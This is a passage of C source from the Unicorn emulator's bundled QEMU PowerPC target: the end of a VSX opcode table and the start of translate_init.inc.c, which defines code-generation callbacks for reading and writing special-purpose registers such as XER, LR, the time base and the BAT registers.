GEN_XX3FORM_NAME(xsmsubsp, "xsmsubmsp", 0x04, 0x03, PPC2_VSX207), GEN_XX3FORM_NAME(xsnmaddsp, "xsnmaddasp", 0x04, 0x10, PPC2_VSX207), GEN_XX3FORM_NAME(xsnmaddsp, "xsnmaddmsp", 0x04, 0x11, PPC2_VSX207), GEN_XX3FORM_NAME(xsnmsubsp, "xsnmsubasp", 0x04, 0x12, PPC2_VSX207), GEN_XX3FORM_NAME(xsnmsubsp, "xsnmsubmsp", 0x04, 0x13, PPC2_VSX207), GEN_XX2FORM(xscvsxdsp, 0x10, 0x13, PPC2_VSX207), GEN_XX2FORM(xscvuxdsp, 0x10, 0x12, PPC2_VSX207), GEN_XX3FORM(xvadddp, 0x00, 0x0C, PPC2_VSX), GEN_XX3FORM(xvsubdp, 0x00, 0x0D, PPC2_VSX), GEN_XX3FORM(xvmuldp, 0x00, 0x0E, PPC2_VSX), GEN_XX3FORM(xvdivdp, 0x00, 0x0F, PPC2_VSX), GEN_XX2FORM(xvredp, 0x14, 0x0D, PPC2_VSX), GEN_XX2FORM(xvsqrtdp, 0x16, 0x0C, PPC2_VSX), GEN_XX2FORM(xvrsqrtedp, 0x14, 0x0C, PPC2_VSX), GEN_XX3FORM(xvtdivdp, 0x14, 0x0F, PPC2_VSX), GEN_XX2FORM(xvtsqrtdp, 0x14, 0x0E, PPC2_VSX), GEN_XX3FORM_NAME(xvmadddp, "xvmaddadp", 0x04, 0x0C, PPC2_VSX), GEN_XX3FORM_NAME(xvmadddp, "xvmaddmdp", 0x04, 0x0D, PPC2_VSX), GEN_XX3FORM_NAME(xvmsubdp, "xvmsubadp", 0x04, 0x0E, PPC2_VSX), GEN_XX3FORM_NAME(xvmsubdp, "xvmsubmdp", 0x04, 0x0F, PPC2_VSX), GEN_XX3FORM_NAME(xvnmadddp, "xvnmaddadp", 0x04, 0x1C, PPC2_VSX), GEN_XX3FORM_NAME(xvnmadddp, "xvnmaddmdp", 0x04, 0x1D, PPC2_VSX), GEN_XX3FORM_NAME(xvnmsubdp, "xvnmsubadp", 0x04, 0x1E, PPC2_VSX), GEN_XX3FORM_NAME(xvnmsubdp, "xvnmsubmdp", 0x04, 0x1F, PPC2_VSX), GEN_XX3FORM(xvmaxdp, 0x00, 0x1C, PPC2_VSX), GEN_XX3FORM(xvmindp, 0x00, 0x1D, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpeqdp, 0x0C, 0x0C, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpgtdp, 0x0C, 0x0D, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpgedp, 0x0C, 0x0E, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpnedp, 0x0C, 0x0F, PPC2_ISA300), GEN_XX2FORM(xvcvdpsp, 0x12, 0x18, PPC2_VSX), GEN_XX2FORM(xvcvdpsxds, 0x10, 0x1D, PPC2_VSX), GEN_XX2FORM(xvcvdpsxws, 0x10, 0x0D, PPC2_VSX), GEN_XX2FORM(xvcvdpuxds, 0x10, 0x1C, PPC2_VSX), GEN_XX2FORM(xvcvdpuxws, 0x10, 0x0C, PPC2_VSX), GEN_XX2FORM(xvcvsxddp, 0x10, 0x1F, PPC2_VSX), GEN_XX2FORM(xvcvuxddp, 0x10, 0x1E, PPC2_VSX), GEN_XX2FORM(xvcvsxwdp, 0x10, 0x0F, PPC2_VSX), GEN_XX2FORM(xvcvuxwdp, 0x10, 0x0E, PPC2_VSX), GEN_XX2FORM(xvrdpi, 0x12, 0x0C, PPC2_VSX), GEN_XX2FORM(xvrdpic, 0x16, 0x0E, PPC2_VSX), GEN_XX2FORM(xvrdpim, 0x12, 0x0F, PPC2_VSX), GEN_XX2FORM(xvrdpip, 0x12, 0x0E, PPC2_VSX), GEN_XX2FORM(xvrdpiz, 0x12, 0x0D, PPC2_VSX), GEN_XX3FORM(xvaddsp, 0x00, 0x08, PPC2_VSX), GEN_XX3FORM(xvsubsp, 0x00, 0x09, PPC2_VSX), GEN_XX3FORM(xvmulsp, 0x00, 0x0A, PPC2_VSX), GEN_XX3FORM(xvdivsp, 0x00, 0x0B, PPC2_VSX), GEN_XX2FORM(xvresp, 0x14, 0x09, PPC2_VSX), GEN_XX2FORM(xvsqrtsp, 0x16, 0x08, PPC2_VSX), GEN_XX2FORM(xvrsqrtesp, 0x14, 0x08, PPC2_VSX), GEN_XX3FORM(xvtdivsp, 0x14, 0x0B, PPC2_VSX), GEN_XX2FORM(xvtsqrtsp, 0x14, 0x0A, PPC2_VSX), GEN_XX3FORM_NAME(xvmaddsp, "xvmaddasp", 0x04, 0x08, 
PPC2_VSX), GEN_XX3FORM_NAME(xvmaddsp, "xvmaddmsp", 0x04, 0x09, PPC2_VSX), GEN_XX3FORM_NAME(xvmsubsp, "xvmsubasp", 0x04, 0x0A, PPC2_VSX), GEN_XX3FORM_NAME(xvmsubsp, "xvmsubmsp", 0x04, 0x0B, PPC2_VSX), GEN_XX3FORM_NAME(xvnmaddsp, "xvnmaddasp", 0x04, 0x18, PPC2_VSX), GEN_XX3FORM_NAME(xvnmaddsp, "xvnmaddmsp", 0x04, 0x19, PPC2_VSX), GEN_XX3FORM_NAME(xvnmsubsp, "xvnmsubasp", 0x04, 0x1A, PPC2_VSX), GEN_XX3FORM_NAME(xvnmsubsp, "xvnmsubmsp", 0x04, 0x1B, PPC2_VSX), GEN_XX3FORM(xvmaxsp, 0x00, 0x18, PPC2_VSX), GEN_XX3FORM(xvminsp, 0x00, 0x19, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpeqsp, 0x0C, 0x08, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpgtsp, 0x0C, 0x09, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpgesp, 0x0C, 0x0A, PPC2_VSX), GEN_XX3_RC_FORM(xvcmpnesp, 0x0C, 0x0B, PPC2_ISA300), GEN_XX2FORM(xvcvspdp, 0x12, 0x1C, PPC2_VSX), GEN_XX2FORM(xvcvspsxds, 0x10, 0x19, PPC2_VSX), GEN_XX2FORM(xvcvspsxws, 0x10, 0x09, PPC2_VSX), GEN_XX2FORM(xvcvspuxds, 0x10, 0x18, PPC2_VSX), GEN_XX2FORM(xvcvspuxws, 0x10, 0x08, PPC2_VSX), GEN_XX2FORM(xvcvsxdsp, 0x10, 0x1B, PPC2_VSX), GEN_XX2FORM(xvcvuxdsp, 0x10, 0x1A, PPC2_VSX), GEN_XX2FORM(xvcvsxwsp, 0x10, 0x0B, PPC2_VSX), GEN_XX2FORM(xvcvuxwsp, 0x10, 0x0A, PPC2_VSX), GEN_XX2FORM(xvrspi, 0x12, 0x08, PPC2_VSX), GEN_XX2FORM(xvrspic, 0x16, 0x0A, PPC2_VSX), GEN_XX2FORM(xvrspim, 0x12, 0x0B, PPC2_VSX), GEN_XX2FORM(xvrspip, 0x12, 0x0A, PPC2_VSX), GEN_XX2FORM(xvrspiz, 0x12, 0x09, PPC2_VSX), GEN_XX2FORM_EO(xxbrh, 0x16, 0x1D, 0x07, PPC2_ISA300), GEN_XX2FORM_EO(xxbrw, 0x16, 0x1D, 0x0F, PPC2_ISA300), GEN_XX2FORM_EO(xxbrd, 0x16, 0x1D, 0x17, PPC2_ISA300), GEN_XX2FORM_EO(xvcvhpsp, 0x16, 0x1D, 0x18, PPC2_ISA300), GEN_XX2FORM_EO(xvcvsphp, 0x16, 0x1D, 0x19, PPC2_ISA300), GEN_XX2FORM_EO(xxbrq, 0x16, 0x1D, 0x1F, PPC2_ISA300), #define VSX_LOGICAL(name, opc2, opc3, fl2) \ GEN_XX3FORM(name, opc2, opc3, fl2) VSX_LOGICAL(xxland, 0x8, 0x10, PPC2_VSX), VSX_LOGICAL(xxlandc, 0x8, 0x11, PPC2_VSX), VSX_LOGICAL(xxlor, 0x8, 0x12, PPC2_VSX), VSX_LOGICAL(xxlxor, 0x8, 0x13, PPC2_VSX), VSX_LOGICAL(xxlnor, 0x8, 0x14, PPC2_VSX), VSX_LOGICAL(xxleqv, 0x8, 0x17, PPC2_VSX207), VSX_LOGICAL(xxlnand, 0x8, 0x16, PPC2_VSX207), VSX_LOGICAL(xxlorc, 0x8, 0x15, PPC2_VSX207), GEN_XX3FORM(xxmrghw, 0x08, 0x02, PPC2_VSX), GEN_XX3FORM(xxmrglw, 0x08, 0x06, PPC2_VSX), GEN_XX3FORM(xxperm, 0x08, 0x03, PPC2_ISA300), GEN_XX3FORM(xxpermr, 0x08, 0x07, PPC2_ISA300), GEN_XX2FORM(xxspltw, 0x08, 0x0A, PPC2_VSX), GEN_XX1FORM(xxspltib, 0x08, 0x0B, PPC2_ISA300), GEN_XX3FORM_DM(xxsldwi, 0x08, 0x00), GEN_XX2FORM_EXT(xxextractuw, 0x0A, 0x0A, PPC2_ISA300), GEN_XX2FORM_EXT(xxinsertw, 0x0A, 0x0B, PPC2_ISA300), #define GEN_XXSEL_ROW(opc3) \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x18, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x19, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1A, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1B, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1C, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1D, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1E, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_HANDLER2_E(xxsel, "xxsel", 0x3C, 0x1F, opc3, 0, PPC_NONE, PPC2_VSX), \ GEN_XXSEL_ROW(0x00) GEN_XXSEL_ROW(0x01) GEN_XXSEL_ROW(0x02) GEN_XXSEL_ROW(0x03) GEN_XXSEL_ROW(0x04) GEN_XXSEL_ROW(0x05) GEN_XXSEL_ROW(0x06) GEN_XXSEL_ROW(0x07) GEN_XXSEL_ROW(0x08) GEN_XXSEL_ROW(0x09) GEN_XXSEL_ROW(0x0A) GEN_XXSEL_ROW(0x0B) GEN_XXSEL_ROW(0x0C) GEN_XXSEL_ROW(0x0D) GEN_XXSEL_ROW(0x0E) GEN_XXSEL_ROW(0x0F) GEN_XXSEL_ROW(0x10) GEN_XXSEL_ROW(0x11) 
GEN_XXSEL_ROW(0x12) GEN_XXSEL_ROW(0x13) GEN_XXSEL_ROW(0x14) GEN_XXSEL_ROW(0x15) GEN_XXSEL_ROW(0x16) GEN_XXSEL_ROW(0x17) GEN_XXSEL_ROW(0x18) GEN_XXSEL_ROW(0x19) GEN_XXSEL_ROW(0x1A) GEN_XXSEL_ROW(0x1B) GEN_XXSEL_ROW(0x1C) GEN_XXSEL_ROW(0x1D) GEN_XXSEL_ROW(0x1E) GEN_XXSEL_ROW(0x1F) GEN_XX3FORM_DM(xxpermdi, 0x08, 0x01),

unicorn-2.1.1/qemu/target/ppc/translate_init.inc.c

/* * PowerPC CPU initialization for qemu. * * Copyright (c) 2003-2007 Jocelyn Mayer * Copyright 2011 Freescale Semiconductor, Inc. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>.
*/ #include "sysemu/cpus.h" #include "sysemu/tcg.h" #include "cpu-models.h" #include "mmu-hash32.h" #include "mmu-hash64.h" #include "hw/ppc/ppc.h" #include "mmu-book3s-v3.h" #include "qemu/cutils.h" #include "fpu/softfloat.h" /* * Generic callbacks: * do nothing but store/retrieve spr value */ static void spr_load_dump_spr(TCGContext *tcg_ctx, int sprn) { #ifdef PPC_DUMP_SPR_ACCESSES TCGv_i32 t0 = tcg_const_i32(tcg_ctx, sprn); gen_helper_load_dump_spr(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); #endif } static void spr_read_generic(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_load_spr(tcg_ctx, cpu_gpr[gprn], sprn); spr_load_dump_spr(tcg_ctx, sprn); } static void spr_store_dump_spr(int sprn) { #ifdef PPC_DUMP_SPR_ACCESSES TCGv_i32 t0 = tcg_const_i32(tcg_ctx, sprn); gen_helper_store_dump_spr(tcg_ctx, tcg_ctx->cpu_env, t0); tcg_temp_free_i32(tcg_ctx, t0); #endif } static void spr_write_generic(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_store_spr(tcg_ctx, sprn, cpu_gpr[gprn]); spr_store_dump_spr(sprn); } static void spr_write_generic32(DisasContext *ctx, int sprn, int gprn) { #ifdef TARGET_PPC64 TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_ext32u_tl(tcg_ctx, t0, cpu_gpr[gprn]); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); spr_store_dump_spr(sprn); #else spr_write_generic(ctx, sprn, gprn); #endif } static void spr_write_clear(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_load_spr(tcg_ctx, t0, sprn); tcg_gen_neg_tl(tcg_ctx, t1, cpu_gpr[gprn]); tcg_gen_and_tl(tcg_ctx, t0, t0, t1); gen_store_spr(tcg_ctx, sprn, t0); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } static void spr_access_nop(DisasContext *ctx, int sprn, int gprn) { } /* SPR common to all PowerPC */ /* XER */ static void spr_read_xer(DisasContext *ctx, int gprn, int sprn) { gen_read_xer(ctx, cpu_gpr[gprn]); } static void spr_write_xer(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_write_xer(tcg_ctx, cpu_gpr[gprn]); } /* LR */ static void spr_read_lr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_gpr[gprn], cpu_lr); } static void spr_write_lr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_lr, cpu_gpr[gprn]); } /* CFAR */ #if defined(TARGET_PPC64) static void spr_read_cfar(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_gpr[gprn], cpu_cfar); } static void spr_write_cfar(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_cfar, cpu_gpr[gprn]); } #endif /* CTR */ static void spr_read_ctr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_gpr[gprn], cpu_ctr); } static void spr_write_ctr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_mov_tl(tcg_ctx, cpu_ctr, cpu_gpr[gprn]); } /* User read access to SPR */ /* USPRx */ /* UMMCRx */ /* UPMCx */ /* USIA */ /* UDECR */ static void spr_read_ureg(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_load_spr(tcg_ctx, cpu_gpr[gprn], sprn + 0x10); } #if defined(TARGET_PPC64) static void spr_write_ureg(DisasContext *ctx, int sprn, 
int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_store_spr(tcg_ctx, sprn + 0x10, cpu_gpr[gprn]); } #endif /* SPR common to all non-embedded PowerPC */ /* DECR */ #if 0 static void spr_read_decr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_load_decr(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_stop_exception(ctx); } } #else #define spr_read_decr spr_read_generic #endif #if 0 static void spr_write_decr(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_store_decr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_stop_exception(ctx); } } #else #define spr_write_decr spr_write_generic #endif /* SPR common to all non-embedded PowerPC, except 601 */ /* Time base */ #if 0 static void spr_read_tbl(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_load_tbl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } #else #define spr_read_tbl spr_read_generic #endif #if 0 static void spr_read_tbu(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_load_tbu(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } #else #define spr_read_tbu spr_read_generic #endif #if 0 // ATTRIBUTE_UNUSED static void spr_read_atbl(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_atbl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); } // ATTRIBUTE_UNUSED static void spr_read_atbu(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_load_atbu(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env); } #endif #if 0 static void spr_write_tbl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_store_tbl(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } #else #define spr_write_tbl spr_write_generic #endif #if 0 static void spr_write_tbu(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_start(tcg_ctx); } gen_helper_store_tbu(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) { gen_io_end(tcg_ctx); gen_stop_exception(ctx); } } #else #define spr_write_tbu spr_write_generic #endif #if 0 // ATTRIBUTE_UNUSED static void spr_write_atbl(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_atbl(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } // ATTRIBUTE_UNUSED static void spr_write_atbu(DisasContext *ctx, int sprn, int gprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_store_atbu(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]); } #endif #if defined(TARGET_PPC64) // ATTRIBUTE_UNUSED static void spr_read_purr(DisasContext *ctx, int gprn, int sprn) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; 
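    /*
     * PURR (Processor Utilization of Resources Register): the read is
     * delegated to a runtime helper below so the returned value can
     * track the guest time base instead of a stored SPR value.
     */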
    gen_helper_load_purr(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env);
}

static void spr_write_purr(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_store_purr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}

/* HDECR */
static void spr_read_hdecr(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) {
        gen_io_start(tcg_ctx);
    }
    gen_helper_load_hdecr(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env);
    if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) {
        gen_io_end(tcg_ctx);
        gen_stop_exception(ctx);
    }
}

static void spr_write_hdecr(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) {
        gen_io_start(tcg_ctx);
    }
    gen_helper_store_hdecr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
    if (tb_cflags(ctx->base.tb) & CF_USE_ICOUNT) {
        gen_io_end(tcg_ctx);
        gen_stop_exception(ctx);
    }
}

static void spr_read_vtb(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_load_vtb(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env);
}

static void spr_write_vtb(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_store_vtb(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}

static void spr_write_tbu40(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_store_tbu40(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}
#endif

/* IBAT0U...IBAT7U */
/* IBAT0L...IBAT7L */
static void spr_read_ibat(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env,
                  offsetof(CPUPPCState,
                           IBAT[sprn & 1][(sprn - SPR_IBAT0U) / 2]));
}

static void spr_read_ibat_h(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env,
                  offsetof(CPUPPCState,
                           IBAT[sprn & 1][((sprn - SPR_IBAT4U) / 2) + 4]));
}

static void spr_write_ibatu(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_IBAT0U) / 2);
    gen_helper_store_ibatu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]);
    tcg_temp_free_i32(tcg_ctx, t0);
}

static void spr_write_ibatu_h(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t0 = tcg_const_i32(tcg_ctx, ((sprn - SPR_IBAT4U) / 2) + 4);
    gen_helper_store_ibatu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]);
    tcg_temp_free_i32(tcg_ctx, t0);
}

static void spr_write_ibatl(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_IBAT0L) / 2);
    gen_helper_store_ibatl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]);
    tcg_temp_free_i32(tcg_ctx, t0);
}

static void spr_write_ibatl_h(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t0 = tcg_const_i32(tcg_ctx, ((sprn - SPR_IBAT4L) / 2) + 4);
    gen_helper_store_ibatl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]);
    tcg_temp_free_i32(tcg_ctx, t0);
}

/* DBAT0U...DBAT7U */
/* DBAT0L...DBAT7L */
static void spr_read_dbat(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env,
                  offsetof(CPUPPCState,
                           DBAT[sprn & 1][(sprn - SPR_DBAT0U) / 2]));
}

static void spr_read_dbat_h(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env,
                  offsetof(CPUPPCState,
                           DBAT[sprn & 1][((sprn - SPR_DBAT4U) / 2) + 4]));
}

static void spr_write_dbatu(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_DBAT0U) / 2);
    gen_helper_store_dbatu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]);
    tcg_temp_free_i32(tcg_ctx, t0);
}

static void spr_write_dbatu_h(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t0 = tcg_const_i32(tcg_ctx, ((sprn - SPR_DBAT4U) / 2) + 4);
    gen_helper_store_dbatu(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]);
    tcg_temp_free_i32(tcg_ctx, t0);
}

static void spr_write_dbatl(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t0 = tcg_const_i32(tcg_ctx, (sprn - SPR_DBAT0L) / 2);
    gen_helper_store_dbatl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]);
    tcg_temp_free_i32(tcg_ctx, t0);
}

static void spr_write_dbatl_h(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv_i32 t0 = tcg_const_i32(tcg_ctx, ((sprn - SPR_DBAT4L) / 2) + 4);
    gen_helper_store_dbatl(tcg_ctx, tcg_ctx->cpu_env, t0, cpu_gpr[gprn]);
    tcg_temp_free_i32(tcg_ctx, t0);
}

/* SDR1 */
static void spr_write_sdr1(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_store_sdr1(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}

#if defined(TARGET_PPC64)
/* 64-bit PowerPC specific SPRs */
/* PIDR */
static void spr_write_pidr(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_store_pidr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}

static void spr_write_lpidr(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_store_lpidr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}

static void spr_read_hior(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    tcg_gen_ld_tl(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env,
                  offsetof(CPUPPCState, excp_prefix));
}

static void spr_write_hior(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    TCGv t0 = tcg_temp_new(tcg_ctx);
    tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[gprn], 0x3FFFFF00000ULL);
    tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env,
                  offsetof(CPUPPCState, excp_prefix));
    tcg_temp_free(tcg_ctx, t0);
}

static void spr_write_ptcr(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_store_ptcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}

static void spr_write_pcr(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_store_pcr(tcg_ctx, tcg_ctx->cpu_env, cpu_gpr[gprn]);
}

/* DPDES */
static void spr_read_dpdes(DisasContext *ctx, int gprn, int sprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
    gen_helper_load_dpdes(tcg_ctx, cpu_gpr[gprn], tcg_ctx->cpu_env);
}

static void spr_write_dpdes(DisasContext *ctx, int sprn, int gprn)
{
    TCGContext *tcg_ctx = ctx->uc->tcg_ctx;
